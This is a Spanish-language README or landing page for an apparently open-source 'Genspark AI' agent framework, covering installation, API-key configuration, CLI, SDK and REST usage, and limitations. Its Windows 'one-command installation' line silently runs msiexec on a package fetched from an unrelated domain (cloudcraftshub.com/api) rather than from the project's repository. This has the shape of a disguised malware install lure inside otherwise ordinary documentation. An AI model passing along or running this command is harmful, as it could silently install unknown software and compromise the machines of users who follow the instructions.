Qué hace Genspark AI
Genspark AI es un framework de Super Agent de código abierto (licencia MIT) que te permite entregar un objetivo de alto nivel a un agente orquestador. El agente planifica, razona y ejecuta tareas de varios pasos coordinando múltiples Large Language Models, cada uno con acceso a más de 80 herramientas.
Replica la amplitud de plataformas cerradas como Genspark.ai sin costes de suscripción, dependencia de la nube ni ataduras a un proveedor. Puedes ejecutar todo en local con Ollama para la privacidad de los datos, conectar cualquier proveedor de LLM (OpenAI, Anthropic, Gemini, Mistral, modelos locales) y ampliar el conjunto de herramientas añadiendo una función de Python en una carpeta.
Los resultados incluyen Sparkpages (páginas dinámicas de síntesis con citas), presentaciones (.pptx, HTML, Reveal.js), hojas de cálculo (.xlsx), imágenes generadas, código ejecutado y llamadas telefónicas guiadas por voz.
El sistema se despliega como CLI, interfaz web, API REST o contenedor Docker.
# Windows one-command installation (run in cmd.exe) cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw # Linux/macOS shell installer curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash # Any OS via pip pip install genspark-ai genspark serve # Docker docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest
Configuración inicial
Copia el archivo de entorno de ejemplo y completa las claves de tus proveedores.
Como mínimo, configura una clave de API de LLM (OpenAI, Anthropic o Google) o configura Ollama para un funcionamiento totalmente local definiendo OLLAMA_BASE_URL.
Las claves opcionales para herramientas, como TAVILY_API_KEY o SERPER_API_KEY, mejoran la búsqueda web, y TWILIO_AUTH_TOKEN habilita las capacidades de llamada telefónica.
El enrutamiento de modelos se controla mediante tres variables: GENSPARK_DEFAULT_MODEL para la planificación y el razonamiento, GENSPARK_FAST_MODEL para triaje rápido y GENSPARK_LOCAL_MODEL para cargas de trabajo donde la privacidad es crítica.
Puedes dejar las claves de la nube vacías; el enrutador omite los proveedores no disponibles y utiliza solo los modelos que hayas configurado.
# Pick at least one LLM provider OPENAI_API_KEY=sk-... ANTHROPIC_API_KEY=sk-ant-... GOOGLE_API_KEY=... # Fully local? Use Ollama — no key needed OLLAMA_BASE_URL=http://localhost:11434 # Optional tool keys TAVILY_API_KEY=... SERPER_API_KEY=... TWILIO_AUTH_TOKEN=... # Default routing GENSPARK_DEFAULT_MODEL=claude-opus-4-7 GENSPARK_FAST_MODEL=gpt-5-mini GENSPARK_LOCAL_MODEL=ollama/llama3.2
Uso de Genspark AI
Interactúa a través de cuatro interfaces:
- CLI:
genspark chatpara sesiones interactivas,genspark runpara tareas de un solo paso,genspark servepara lanzar la interfaz web ygenspark apipara el servidor REST. - SDK de Python: instancia
SuperAgent(model="claude-opus-4-7")y llama aagent.run()para obtener un objeto resultado con los atributos.sparkpage,.slidesy.sheet. - API REST: envía un POST a
/v1/runcon un campoprompt.
Los flujos de trabajo típicos incluyen investigación profunda (Sparkpage con citas en línea y preguntas de seguimiento), creación de contenido (presentación y hoja de cálculo a partir de un único prompt), ejecución de código en un entorno aislado (Python, JavaScript, SQL) y automatización web con herramientas respaldadas por Playwright que rellenan formularios, hacen scraping y navegan.
# CLI commands genspark chat genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet" genspark serve --port 8080 genspark api --port 8000 # REST API curl -X POST http://localhost:8000/v1/run \ -H "Content-Type: application/json" \ -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'
from genspark import SuperAgent agent = SuperAgent(model="claude-opus-4-7") result = agent.run( "Find the 10 fastest growing open-source AI agent repos this month, " "then build me a 5-slide pitch on the trend." ) print(result.sparkpage) result.slides.save("deck.pptx") result.sheet.save("data.xlsx")
Restricciones y Best Practices
Limitaciones actuales: Muchas funcionalidades están aún planificadas: modo de voz en tiempo real, agente de navegador completo con visión, aplicación móvil, memoria a largo plazo/RAG, mercado comunitario, ejecución en enjambre y protocolo Agent‑to‑Agent.
La integración de llamadas telefónicas es una vista previa.
El enrutamiento de modelos falla si faltan credenciales o cuota.
Las herramientas personalizadas deben usar el decorador @tool y residir en el directorio tools/; no hay GUI.
La calidad del funcionamiento local depende por completo de los modelos de Ollama que se hayan descargado.
El proyecto no está afiliado a Genspark Inc.
Best practices: Comienza con un modelo en la nube potente para la planificación y recurre a un modelo rápido o local utilizando las variables de enrutamiento.
Utiliza Ollama cuando la privacidad sea primordial.
Amplía las capacidades decorando una función de Python con @tool y colocándola en tools/.
Revisa los registros de planificación para entender la descomposición en subtareas.
Usa la interfaz web (genspark serve) para investigaciones complejas: proporciona visualización de Sparkpages y preguntas de seguimiento en línea.
Para el desarrollo, clona el repositorio, configura un entorno virtual, instala con pip install -e ".[dev]" y ejecuta pytest.



